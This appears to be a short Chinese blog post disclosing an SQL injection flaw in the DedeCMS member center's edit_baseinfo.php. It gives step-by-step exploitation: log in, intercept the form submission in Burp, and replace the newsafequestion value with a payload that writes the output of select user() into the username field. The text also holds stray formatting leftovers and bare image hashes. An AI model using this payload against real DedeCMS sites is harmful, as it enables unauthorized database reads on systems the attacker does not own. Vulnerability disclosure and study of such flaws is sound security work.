Dedecms 会员中心注入漏洞2

文章目录

漏洞作者: Matt

[/crayon]

漏洞证明:

利用方法 注册用户并且登陆

完了打开http://127.0.0.1/dede/member/edit_baseinfo.php

然后随便写一下

输入验证码 打开BURP 抓包

点击提交

然后再BURP里修改newsafequestion 的值改成1′,email=@',uname=(select user()),email=’sss

然后提交 之后再打开http://127.0.0.1/dede/member/edit_baseinfo.php

就可以看到自己的、用户名变成了注入之后的结果了

14155301ecefc6543322f66d64b37a2a1ade5673

141553119fbe73451f10f406f1ddbbced91140a8

 

 

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录